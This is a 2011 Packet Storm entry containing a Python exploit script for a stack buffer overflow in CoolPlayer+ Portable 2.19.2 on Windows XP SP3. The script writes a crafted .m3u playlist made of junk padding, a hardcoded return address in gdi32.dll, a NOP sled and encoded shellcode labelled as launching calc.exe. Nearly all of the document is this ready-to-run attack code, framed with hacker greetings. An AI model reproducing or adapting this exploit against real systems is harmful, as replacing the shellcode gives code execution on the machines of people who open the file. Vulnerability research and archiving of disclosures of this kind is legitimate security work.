CoolPlayer Portable 2.19.2 Buffer Overflow

2011-05-17T00:00:00
ID PACKETSTORM:101477
Type packetstorm
Reporter Securityxxxpert
Modified 2011-05-17T00:00:00

Description

                                        
                                            `#CoolPlayer+ Portable Buffer Overflow  
#Version: 2.19.2  
#Author: Securityxxxpert  
#Date Submitted: May 16, 2011  
#Download Link: http://download.cnet.com/CoolPlayer-Portable/3000-2139_4-75448619.html  
#Tested on: Windows Xp Sp3  
print "--------------------------------------------------------------------------------"  
print " Cool Player Exploit "  
print " Retreat Hell! "  
print "Greetz: Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. Nick, Rek0n "  
print "Greetz Cont: Podjackel, g0tmi1k & The entire Corelan & Offensive Security Team "  
print "--------------------------------------------------------------------------------"  
filename = "exploit.m3u"  
junk = "\x41"*210  
EIP = "\x8A\x1D\xF3\x77" #0x77F31D8A gdi32.dll  
nopsled = "\x90"*22  
#calc.exe  
sc = ("\xb8\x20\x65\x02\x44\xdb\xc2\xd9\x74\x24\xf4\x5a\x33\xc9"  
"\xb1\x32\x31\x42\x12\x03\x42\x12\x83\xca\x99\xe0\xb1\xf6"  
"\x8a\x6c\x39\x06\x4b\x0f\xb3\xe3\x7a\x1d\xa7\x60\x2e\x91"  
"\xa3\x24\xc3\x5a\xe1\xdc\x50\x2e\x2e\xd3\xd1\x85\x08\xda"  
"\xe2\x2b\x95\xb0\x21\x2d\x69\xca\x75\x8d\x50\x05\x88\xcc"  
"\x95\x7b\x63\x9c\x4e\xf0\xd6\x31\xfa\x44\xeb\x30\x2c\xc3"  
"\x53\x4b\x49\x13\x27\xe1\x50\x43\x98\x7e\x1a\x7b\x92\xd9"  
"\xbb\x7a\x77\x3a\x87\x35\xfc\x89\x73\xc4\xd4\xc3\x7c\xf7"  
"\x18\x8f\x42\x38\x95\xd1\x83\xfe\x46\xa4\xff\xfd\xfb\xbf"  
"\x3b\x7c\x20\x35\xde\x26\xa3\xed\x3a\xd7\x60\x6b\xc8\xdb"  
"\xcd\xff\x96\xff\xd0\x2c\xad\xfb\x59\xd3\x62\x8a\x1a\xf0"  
"\xa6\xd7\xf9\x99\xff\xbd\xac\xa6\xe0\x19\x10\x03\x6a\x8b"  
"\x45\x35\x31\xc1\x98\xb7\x4f\xac\x9b\xc7\x4f\x9e\xf3\xf6"  
"\xc4\x71\x83\x06\x0f\x36\x7b\x4d\x12\x1e\x14\x08\xc6\x23"  
"\x79\xab\x3c\x67\x84\x28\xb5\x17\x73\x30\xbc\x12\x3f\xf6"  
"\x2c\x6e\x50\x93\x52\xdd\x51\xb6\x30\x80\xc1\x5a\xb7")  
  
  
exploit = junk + EIP + nopsled + sc  
textfile = open(filename,"w")  
textfile.write(exploit)  
textfile.close()  
  
`